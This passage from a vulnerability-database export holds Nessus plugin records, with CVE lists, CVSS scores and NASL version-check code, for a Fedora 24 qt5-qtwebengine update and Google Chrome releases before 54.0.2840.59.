"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:25:07", "description": "This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS (long-term support) branch. This is a snapshot of the QtWebEngine that will be included in the bugfix and security release Qt 5.6.3, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155, CVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171, CVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186, CVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214, CVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652, CVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009, CVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016, CVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024, CVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029, CVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046, CVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050, CVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062, CVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078, CVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in QtWebEngine 5.7.x) with security fixes from Chromium up to version 59.0.3071.104. (5.6.2 was based on Chromium 45.0.2554.101 with security fixes from Chromium up to version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been backported.\n\nSee http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all security backports are listed in that file yet. The list above is accurate.)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "Fedora 24 : qt5-qtwebengine (2017-98bed96d12)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5078", "CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652", "CVE-2017-5006", "CVE-2017-5007", "CVE-2017-5008", "CVE-2017-5009", "CVE-2017-5010", "CVE-2017-5012", "CVE-2017-5015", "CVE-2017-5016", "CVE-2017-5017", "CVE-2017-5019", "CVE-2017-5023", "CVE-2017-5024", "CVE-2017-5025", "CVE-2017-5026", "CVE-2017-5027", "CVE-2017-5029", "CVE-2017-5033", "CVE-2017-5037", "CVE-2017-5044", "CVE-2017-5046", "CVE-2017-5047", "CVE-2017-5048", "CVE-2017-5049", "CVE-2017-5050", "CVE-2017-5051", "CVE-2017-5059", "CVE-2017-5061", "CVE-2017-5062", "CVE-2017-5065", "CVE-2017-5067", "CVE-2017-5069", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5083", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-98BED96D12.NASL", "href": "https://www.tenable.com/plugins/nessus/101920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-98bed96d12.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101920);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2016-5078\",\n \"CVE-2016-5133\",\n \"CVE-2016-5147\",\n \"CVE-2016-5153\",\n \"CVE-2016-5155\",\n \"CVE-2016-5161\",\n \"CVE-2016-5166\",\n \"CVE-2016-5170\",\n \"CVE-2016-5171\",\n \"CVE-2016-5172\",\n \"CVE-2016-5181\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5192\",\n \"CVE-2016-5198\",\n \"CVE-2016-5205\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\",\n \"CVE-2017-5006\",\n \"CVE-2017-5007\",\n \"CVE-2017-5008\",\n \"CVE-2017-5009\",\n \"CVE-2017-5010\",\n \"CVE-2017-5012\",\n \"CVE-2017-5015\",\n \"CVE-2017-5016\",\n \"CVE-2017-5017\",\n \"CVE-2017-5019\",\n \"CVE-2017-5023\",\n \"CVE-2017-5024\",\n \"CVE-2017-5025\",\n \"CVE-2017-5026\",\n \"CVE-2017-5027\",\n \"CVE-2017-5029\",\n \"CVE-2017-5033\",\n \"CVE-2017-5037\",\n \"CVE-2017-5044\",\n \"CVE-2017-5046\",\n \"CVE-2017-5047\",\n \"CVE-2017-5048\",\n \"CVE-2017-5049\",\n \"CVE-2017-5050\",\n \"CVE-2017-5051\",\n \"CVE-2017-5059\",\n \"CVE-2017-5061\",\n \"CVE-2017-5062\",\n \"CVE-2017-5065\",\n \"CVE-2017-5067\",\n \"CVE-2017-5069\",\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5083\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 24 : qt5-qtwebengine (2017-98bed96d12)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS\n(long-term support) branch. This is a snapshot of the QtWebEngine that\nwill be included in the bugfix and security release Qt 5.6.3, but only\nthe QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155,\nCVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171,\nCVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186,\nCVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224,\nCVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652,\nCVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009,\nCVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016,\nCVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024,\nCVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029,\nCVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046,\nCVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050,\nCVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062,\nCVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070,\nCVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078,\nCVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in\n QtWebEngine 5.7.x) with security fixes from Chromium up\n to version 59.0.3071.104. (5.6.2 was based on Chromium\n 45.0.2554.101 with security fixes from Chromium up to\n version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been\n backported.\n\nSee\nhttp://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all\nsecurity backports are listed in that file yet. The list above is\naccurate.)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n # http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.6\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfc84d1b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-98bed96d12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"qt5-qtwebengine-5.6.3-0.1.20170712gitee719ad313e564.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:39:14", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X host is prior to 54.0.2840.59. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exists in the Blink and Bookmarks components due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-5181, CVE-2016-5191)\n\n - A heap-based buffer overflow condition exists in Blink due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5182)\n\n - Multiple use-after-free errors exist in PDFium that allow an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5183, CVE-2016-5184)\n\n - A use-after-free error exists in Blink that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5185)\n\n - An out-of-bounds read error exists in the DevTools component that allows an unauthenticated, remote attacker to disclose memory contents. (CVE-2016-5186)\n\n - Multiple unspecified flaws exist that allow an unauthenticated, remote attacker to spoof URLs.\n (CVE-2016-5187, CVE-2016-5189)\n\n - An unspecified flaw exists related to the display of drop-down menus that allows an unauthenticated, remote attacker to disguise user interface elements and conduct spoofing attacks. (CVE-2016-5188)\n\n - A use-after-free error exists in the Internals component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5190)\n\n - An unspecified flaw exists in Blink that allows an unauthenticated, remote attacker to bypass Cross-Origin Resource Sharing (CORS) restrictions. (CVE-2016-5192)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass schemes.\n (CVE-2016-5193)\n\n - Multiple unspecified flaws exist in the Skia component that allow an unauthenticated, remote attacker to impact integrity. (CVE-2016-5194)\n\n - A flaw exists in FrameView.cpp due to improper handling of orthogonal writing mode roots with floating siblings.\n An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5194)\n\n - A flaw exists in permission_prompt_impl.cc due to improper handling of permission bubbles. An unauthenticated, remote attacker can exploit this, via a specially crafted website performing timing attacks, to obtain unintended permissions. (CVE-2016-5194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-19T00:00:00", "type": "nessus", "title": "Google Chrome < 54.0.2840.59 Multiple Vulnerabilities (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_54_0_2840_59.NASL", "href": "https://www.tenable.com/plugins/nessus/94137", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94137);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2016-5181\",\n \"CVE-2016-5182\",\n \"CVE-2016-5183\",\n \"CVE-2016-5184\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5189\",\n \"CVE-2016-5190\",\n \"CVE-2016-5191\",\n \"CVE-2016-5192\",\n \"CVE-2016-5193\",\n \"CVE-2016-5194\"\n );\n script_bugtraq_id(93528);\n\n script_name(english:\"Google Chrome < 54.0.2840.59 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 54.0.2840.59. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exists in\n the Blink and Bookmarks components due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted request, to execute arbitrary script code in a\n user's browser session. (CVE-2016-5181, CVE-2016-5191)\n\n - A heap-based buffer overflow condition exists in Blink\n due to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5182)\n\n - Multiple use-after-free errors exist in PDFium that\n allow an unauthenticated, remote attacker to execute\n arbitrary code. (CVE-2016-5183, CVE-2016-5184)\n\n - A use-after-free error exists in Blink that allows an\n unauthenticated, remote attacker to execute arbitrary\n code. (CVE-2016-5185)\n\n - An out-of-bounds read error exists in the DevTools\n component that allows an unauthenticated, remote\n attacker to disclose memory contents. (CVE-2016-5186)\n\n - Multiple unspecified flaws exist that allow an\n unauthenticated, remote attacker to spoof URLs.\n (CVE-2016-5187, CVE-2016-5189)\n\n - An unspecified flaw exists related to the display of\n drop-down menus that allows an unauthenticated, remote\n attacker to disguise user interface elements and conduct\n spoofing attacks. (CVE-2016-5188)\n\n - A use-after-free error exists in the Internals component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2016-5190)\n\n - An unspecified flaw exists in Blink that allows an\n unauthenticated, remote attacker to bypass Cross-Origin\n Resource Sharing (CORS) restrictions. (CVE-2016-5192)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass schemes.\n (CVE-2016-5193)\n\n - Multiple unspecified flaws exist in the Skia component\n that allow an unauthenticated, remote attacker to impact\n integrity. (CVE-2016-5194)\n\n - A flaw exists in FrameView.cpp due to improper handling\n of orthogonal writing mode roots with floating siblings.\n An unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5194)\n\n - A flaw exists in permission_prompt_impl.cc due to\n improper handling of permission bubbles. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted website performing timing attacks, to\n obtain unintended permissions. (CVE-2016-5194)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.ca/2016/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97775924\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 54.0.2840.59 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5194\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'54.0.2840.59', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:06:30", "description": "The version of Google Chrome installed on the remote Windows host is prior to 54.0.2840.59. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exists in the Blink and Bookmarks components due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-5181, CVE-2016-5191)\n\n - A heap-based buffer overflow condition exists in Blink due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5182)\n\n - Multiple use-after-free errors exist in PDFium that allow an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5183, CVE-2016-5184)\n\n - A use-after-free error exists in Blink that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5185)\n\n - An out-of-bounds read error exists in the DevTools component that allows an unauthenticated, remote attacker to disclose memory contents. (CVE-2016-5186)\n\n - Multiple unspecified flaws exist that allow an unauthenticated, remote attacker to spoof URLs.\n (CVE-2016-5187, CVE-2016-5189)\n\n - An unspecified flaw exists related to the display of drop-down menus that allows an unauthenticated, remote attacker to disguise user interface elements and conduct spoofing attacks. (CVE-2016-5188)\n\n - A use-after-free error exists in the Internals component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2016-5190)\n\n - An unspecified flaw exists in Blink that allows an unauthenticated, remote attacker to bypass Cross-Origin Resource Sharing (CORS) restrictions. (CVE-2016-5192)\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to bypass schemes.\n (CVE-2016-5193)\n\n - Multiple unspecified flaws exist in the Skia component that allow an unauthenticated, remote attacker to impact integrity. (CVE-2016-5194)\n\n - A flaw exists in FrameView.cpp due to improper handling of orthogonal writing mode roots with floating siblings.\n An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-5194)\n\n - A flaw exists in permission_prompt_impl.cc due to improper handling of permission bubbles. An unauthenticated, remote attacker can exploit this, via a specially crafted website performing timing attacks, to obtain unintended permissions. (CVE-2016-5194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-19T00:00:00", "type": "nessus", "title": "Google Chrome < 54.0.2840.59 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_54_0_2840_59.NASL", "href": "https://www.tenable.com/plugins/nessus/94136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94136);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-5181\",\n \"CVE-2016-5182\",\n \"CVE-2016-5183\",\n \"CVE-2016-5184\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5189\",\n \"CVE-2016-5190\",\n \"CVE-2016-5191\",\n \"CVE-2016-5192\",\n \"CVE-2016-5193\",\n \"CVE-2016-5194\"\n );\n script_bugtraq_id(93528);\n\n script_name(english:\"Google Chrome < 54.0.2840.59 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 54.0.2840.59. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exists in\n the Blink and Bookmarks components due to improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit these, via a specially\n crafted request, to execute arbitrary script code in a\n user's browser session. (CVE-2016-5181, CVE-2016-5191)\n\n - A heap-based buffer overflow condition exists in Blink\n due to improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5182)\n\n - Multiple use-after-free errors exist in PDFium that\n allow an unauthenticated, remote attacker to execute\n arbitrary code. (CVE-2016-5183, CVE-2016-5184)\n\n - A use-after-free error exists in Blink that allows an\n unauthenticated, remote attacker to execute arbitrary\n code. (CVE-2016-5185)\n\n - An out-of-bounds read error exists in the DevTools\n component that allows an unauthenticated, remote\n attacker to disclose memory contents. (CVE-2016-5186)\n\n - Multiple unspecified flaws exist that allow an\n unauthenticated, remote attacker to spoof URLs.\n (CVE-2016-5187, CVE-2016-5189)\n\n - An unspecified flaw exists related to the display of\n drop-down menus that allows an unauthenticated, remote\n attacker to disguise user interface elements and conduct\n spoofing attacks. (CVE-2016-5188)\n\n - A use-after-free error exists in the Internals component\n that allows an unauthenticated, remote attacker to\n execute arbitrary code. (CVE-2016-5190)\n\n - An unspecified flaw exists in Blink that allows an\n unauthenticated, remote attacker to bypass Cross-Origin\n Resource Sharing (CORS) restrictions. (CVE-2016-5192)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to bypass schemes.\n (CVE-2016-5193)\n\n - Multiple unspecified flaws exist in the Skia component\n that allow an unauthenticated, remote attacker to impact\n integrity. (CVE-2016-5194)\n\n - A flaw exists in FrameView.cpp due to improper handling\n of orthogonal writing mode roots with floating siblings.\n An unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-5194)\n\n - A flaw exists in permission_prompt_impl.cc due to\n improper handling of permission bubbles. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted website performing timing attacks, to\n obtain unintended permissions. (CVE-2016-5194)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.ca/2016/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97775924\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 54.0.2840.59 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5194\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'54.0.2840.59', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:39:16", "description": "Google Chrome Releases reports :\n\n21 security fixes in this release, including :\n\n- [645211] High CVE-2016-5181: Universal XSS in Blink. Credit to Anonymous\n\n- [638615] High CVE-2016-5182: Heap overflow in Blink. Credit to Giwan Go of STEALIEN\n\n- [645122] High CVE-2016-5183: Use after free in PDFium. Credit to 